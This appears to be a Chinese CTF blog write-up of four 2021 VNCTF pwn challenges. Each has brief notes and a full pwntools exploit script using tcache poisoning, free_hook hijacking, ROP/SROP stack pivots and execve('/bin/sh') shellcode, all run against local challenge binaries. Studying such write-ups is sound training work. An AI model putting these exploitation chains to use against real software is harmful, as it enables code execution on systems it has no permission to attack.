---
title: 2021 VNCTF pwn 复现
date: 2022-06-16 16:43:07 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=25/
pin: false
published:
---

## ff(2.32UAF打tcache_struct同时stdout爆破)

UAF打tcache，只有一次show，利用unsortbin残留在tcache上的地址爆破申请stdout泄露libc，任意地址申请free_hook即可

![image-20220616164349178](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616164349178.png)

![image-20220616164409986](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616164409986.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'
context.arch='amd64'
# p = remote("192.168.232.175","10000")
p = process('./pwn')
elf = ELF("./pwn")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def dbg():
    gdb.attach(p)
    pause()

def add(size,con):
    sla('>>','1')
    sla('Size:',size)
    p.sendafter('Content:',con)
def add(size,con):
    p.sendlineafter(">>","1")
    p.sendlineafter(":",str(size))
    p.sendafter(":",con)
def delete():
    p.sendlineafter(">>","2")
def show():
    p.sendlineafter(">>","3")
def edit(con):
    p.sendlineafter(">>","5")
    p.sendafter(":",con)

#-------------------------leak----------------------------

add(0x60,"aaaa")
delete()

show()
key = u64(p.recv(6).ljust(8,'\x00'))
lg('key')
heap_base = key<<12
lg('heap_base')

edit("a"*0x10)
delete()
edit(p64(key^(heap_base+0x10)))
add(0x60,"aaaa")
add(0x60,'\x00'*0x4e + '\x07')
delete()
add(0x48,'\x00'*6+'\x01'+'\x00'*0x5+'\x01'+'\x00'*8)
add(0x38,"\x00"*0x10)
add(0x10,'\x00'*8+'\xc0\x56')
dbg()
add(0x40,p64(0xfbad1800) + '\x00'*0x18 + '\x00')

libc_base = uu64()-0x1e4744
lg('libc_base')
free_hook = libc_base + 0x1e6e40
system = libc_base + libc.sym['system']

add(0x30,p64(free_hook))
add(0x70,p64(system))
add(0x30,"/bin/sh\x00")
delete()

p.interactive()
```

## hh(vmpwn控制栈上返回地址)

VMpwn

![image-20220616191709410](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616191709410.png)

有沙盒，整个执行部分没有对数组下标做校验，可以对栈进行任意操作，考虑控制rbp下边的返回地址实现orw

![image-20220616191547136](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616191547136.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'
context.arch='amd64'
# p = remote("192.168.232.175","10000")
p = process('./hh')
elf = ELF("./hh")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

pop_rdi = 0x4011a3
pop_rdx_rsi = 0x115189 #offset

pay = p32(9)+p32(0x67616c66)+p32(12)+p32(0xd9) #flag
pay += p32(9)+p32(pop_rdi)+p32(12)+p32(0x3ef)
pay += p32(9)+p32(0)+p32(12)+p32(0x3f0) #pop_rdi
pay += p32(10)+p32(0x3ed)+p32(9)+p32(0xc70)+p32(2)+p32(12)+p32(0x3f1)
pay += p32(10)+p32(0x3ee)+p32(12)+p32(0x3f2) #flag_addr
pay += p32(10)+p32(0x3f7)+p32(9)+p32(0xf4949)+p32(1)+p32(12)+p32(0x3f3)
pay += p32(10)+p32(0x3f8)+p32(12)+p32(0x3f4) #pop_rdx_rsi
pay += p32(9)+p32(0)+p32(12)+p32(0x3f5)+p32(12)+p32(0x3f6) #rdx
pay += p32(12)+p32(0x3f7)+p32(12)+p32(0x3f8) #esi
pay += p32(10)+p32(0x3f3)+p32(9)+p32(0x1e099)+p32(2)+p32(12)+p32(0x3f9)
pay += p32(10)+p32(0x3f4)+p32(12)+p32(0x3fa) #open
pay += p32(9)+p32(pop_rdi)+p32(12)+p32(0x3fb)
pay += p32(9)+p32(0)+p32(12)+p32(0x3fc) #pop_rdi
pay += p32(9)+p32(3)+p32(12)+p32(0x3fd)
pay += p32(9)+p32(0)+p32(12)+p32(0x3fe) #3
pay += p32(10)+p32(0x3f3)+p32(12)+p32(0x3ff)
pay += p32(10)+p32(0x3f4)+p32(12)+p32(0x400) #pop_rdx_rsi
pay += p32(9)+p32(0x30)+p32(12)+p32(0x401)
pay += p32(9)+p32(0)+p32(12)+p32(0x402) #rdx
pay += p32(10)+p32(0x3ed)+p32(9)+p32(0xb70)+p32(2)+p32(12)+p32(0x403)
pay += p32(10)+p32(0x3ee)+p32(12)+p32(0x404) #rsi
pay += p32(10)+p32(0x3f3)+p32(9)+p32(0x1de79)+p32(2)+p32(12)+p32(0x405)
pay += p32(10)+p32(0x3f4)+p32(12)+p32(0x406) #read
pay += p32(9)+p32(pop_rdi)+p32(12)+p32(0x407)
pay += p32(9)+p32(0)+p32(12)+p32(0x408) #pop_rdi
pay += p32(9)+p32(1)+p32(12)+p32(0x409)
pay += p32(9)+p32(0)+p32(12)+p32(0x40a) #1
pay += p32(10)+p32(0x3f3)+p32(12)+p32(0x40b)
pay += p32(10)+p32(0x3f4)+p32(12)+p32(0x40c) #pop_rdx_rsi
pay += p32(9)+p32(0x30)+p32(12)+p32(0x40d)
pay += p32(9)+p32(0)+p32(12)+p32(0x40e) #rdx
pay += p32(10)+p32(0x3ed)+p32(9)+p32(0xb70)+p32(2)+p32(12)+p32(0x40f)
pay += p32(10)+p32(0x3ee)+p32(12)+p32(0x410) #rsi
pay += p32(10)+p32(0x3f3)+p32(9)+p32(0x1de19)+p32(2)+p32(12)+p32(0x411)
pay += p32(10)+p32(0x3f4)+p32(12)+p32(0x412) #write

p.sendline("1")
p.sendline(pay)
p.sendline("2")

p.interactive()
```

## White_Give_Flag(减法数组越界)

会随机申请0x300-0x500大小的chunk，且放入flag，free后未清空

![image-20220616194553205](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616194553205.png)

这个位置有一个减法，其实可以实现越界-1，正好是ptr数组的最后一个chunk位，那只要我们爆破申请0x300的chunk，总有机会申请到flag的那个，然后用越界打印即可

(其实这种题奇怪的地方就会有利用点，减法一定要想越界)

![image-20220616194630586](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616194630586.png)

![image-20220616194536252](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616194536252.png)

**pwntools可以使用shutdown_raw('send') 关闭管道的 send 方向，使远程 read() 读到 EOF，返回 0。**

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level = 'debug'
context.arch='amd64'
# p = remote("192.168.232.175","10000")

elf = ELF("./wgf")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def menu(choice):
    sla('choice:',choice)

def add(size):
    menu('')
    sla('size:\n',size)

def edit(index,data):
    menu('111')
    sla('index:\n',index)
    p.sendafter('Content:\n',data)

def delete(index):
    menu('11')
    sla('index:\n',index)

def show(index):
    menu('1')

while True:
    p = process('./wgf')
    add(0x10)
    add(0x10)
    add(0x10)
    add(0x310)
    edit(3,'x'*0x10)
    p.recvuntil('choice:')
    p.shutdown_raw('send')
    flag = p.recvline()
    print flag
    if '{' in flag or '}' in flag:
        exit(0)
    p.close()
```

## LittleRedFlower(mp_.tcache_bins任意地址申请)

mp_.tcache_bins的使用，涉及到扩展tcache后如何申请的问题，常使用在可申请大sizechunk时，另一篇文章有讲这里不再赘述

谈一下这种技巧的使用，往往和任意地址写值结合使用，可达到任意地址申请的目的

然后这道题cnitlrt师傅的解法还用了一个劫持free_hook在free_hook上方栈迁移实现改权限orw的解法

```c
mov rax, dword ptr [rdi + 0x20]; mov rbp, rdi;test rax, rax; je 0x34fe3; call rax;
```

这条gadget和pop3ret结合，在payload+0x20处写上leave_ret即可跳转执行payload+8

再搞一个read+poprsp，就可以跳转执行rop链了

![image-20220616212743746](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616212743746.png)

![image-20220616213121410](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220616213121410.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level = 'debug'
context.arch='amd64'
# p = remote("192.168.232.175","10000")

p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

#---------------------------------------leak-----------------------------
ru("0x")
libc_base = int(p.recv(12),16)-libc.sym["_IO_2_1_stdout_"]
lg("libc_base")
gadget = 0x0000000000034fd5+libc_base#mov rax, dword ptr [rdi + 0x20]; mov rbp, rdi;test rax, rax; je 0x34fe3; call rax;
pop_rdi = 0x0000000000026bb2+libc_base
pop_rsp = 0x0000000000032c5a+libc_base
pop_rax = 0x0000000000028ff4+libc_base
syscall = 0x0000000000066199+libc_base
pop3r = 0x00000000000e6ce5+libc_base
pop_rsi = 0x000000000002709c+libc_base
pop_rdx_r12 = 0x000000000011c3b1+libc_base
leave_ret = 0x000000000005a9a8+libc_base
free_hook_base = (libc_base+libc.sym["__free_hook"]) & 0xfffffffffffff000
tcache_bins = 0x1ea2d1+libc_base #mp_.tcache_bins
#----------------------------------change mp_tcache-----------------------------
ru("You can write a byte anywhere")
p.send(p64(tcache_bins))
ru("And what?")
p.send(p8(0xff))# ff40
#----------------------------------anywhere malloc -----------------------------
sla('Offset:',0x9e8)
ru("Content:")
p.send(p64(libc_base+libc.sym["__free_hook"]-0xa0))
sla("size:",0x1800)



#----------read payload to free_hook-0xa0 and set gadget-------------------------
payload  = p64(0)+p64(pop3r)+p64(0)*2+p64(leave_ret)
payload += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(free_hook_base)
payload += p64(pop_rdx_r12)+p64(0x1000)*2+p64(pop_rax)+p64(0)
payload += p64(syscall)
payload += p64(pop_rsp)+p64(free_hook_base)
payload  = payload.ljust(0xa0,"\x00")
# print len(payload)
payload += p64(gadget)

sla(">>",payload)
#----------------------------------free and jmp to orw ------------------- -----
payload =[pop_rdi,free_hook_base,pop_rsi,0x2000,pop_rdx_r12,7,7,pop_rax,10,syscall,free_hook_base+0x70]
sc  = shellcraft.open("flag");
sc += shellcraft.read(3,free_hook_base+0x300,0x100)
sc += shellcraft.write(1,free_hook_base+0x300,0x100)

p.sendline(flat(payload).ljust(0x70,"\x00")+asm(sc))

p.interactive()
```
这里后边劫持free_hook部分也可以用setcontext+61

```c
mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; 
```

利用这个gadget在free_hook上下布置，上布置free(rdi/payload)，从而执行srop的mprotect;下布置srop rsp跳转，开始执行asm汇编。

```python
# _*_ coding:utf-8 _*_
from pwn import *
# context.log_level = 'debug'
context.arch='amd64'
# p = remote("192.168.232.175","10000")

p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

#---------------------------------------leak-----------------------------
ru("0x")
libc_base = int(p.recv(12),16)-libc.sym["_IO_2_1_stdout_"]
lg("libc_base")
gadget = 0x0000000000034fd5+libc_base#mov rax, dword ptr [rdi + 0x20]; mov rbp, rdi;test rax, rax; je 0x34fe3; call rax;
pop_rdi = 0x0000000000026bb2+libc_base
pop_rsp = 0x0000000000032c5a+libc_base
pop_rax = 0x0000000000028ff4+libc_base
syscall = 0x0000000000066199+libc_base
pop3r = 0x00000000000e6ce5+libc_base
pop_rsi = 0x000000000002709c+libc_base
pop_rdx_r12 = 0x000000000011c3b1+libc_base
leave_ret = 0x000000000005a9a8+libc_base
fake_rsp = (libc_base+libc.sym["__free_hook"]) & 0xfffffffffffff000
setcontext = libc_base+libc.sym['setcontext']+61
mprotect_addr = libc_base + libc.sym['mprotect']
tcache_bins = 0x1ea2d1+libc_base #mp_.tcache_bins
magic = libc_base + 0x0000000000154b20
lg('magic')
# mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; 
#----------------------------------change mp_tcache-----------------------------
ru("You can write a byte anywhere")
p.send(p64(tcache_bins))
ru("And what?")
p.send(p8(0xff))# ff40
#----------------------------------anywhere malloc -----------------------------
sla('Offset:',0x9e8)
ru("Content:")
p.send(p64(libc_base+libc.sym["__free_hook"]-0x150))
sla("size:",0x1800)

#--------------------------------------------------------------------------------
readjmp= '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000
mov eax,0
syscall
jmp rsi
''' % fake_rsp

frame = SigreturnFrame()
frame.rsp = libc_base + libc.sym['__free_hook']+0x10
frame.rdi = fake_rsp
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = libc_base + libc.sym['mprotect']

frame_addr = libc_base+libc.sym["__free_hook"]-0x150+0x10# fake frame start

payload = p64(0)+p64(frame_addr)+p64(0)*4+p64(setcontext)+str(frame)[0x28:]# fake frame
payload = payload.ljust(0x150,'\x00')
payload += p64(magic)+p64(0)+p64(libc_base+libc.sym["__free_hook"]+0x18)+asm(readjmp)

sla(">>",payload)

shellcode = asm(shellcraft.cat('flag'))
shellcode += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))
p.send(shellcode)

p.interactive()
```

